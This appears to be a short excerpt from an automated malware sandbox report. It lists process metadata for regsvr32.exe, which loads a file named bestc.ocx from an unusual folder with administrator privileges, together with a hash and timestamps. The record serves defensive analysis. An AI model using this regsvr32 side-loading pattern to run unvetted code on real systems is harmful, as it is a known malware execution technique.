                                  General

                                  Start time:14:26:32
                                  Start date:25/11/2021
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx
                                  Imagebase:0xff9d0000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Disassembly

                                  Code Analysis

                                  Reset < >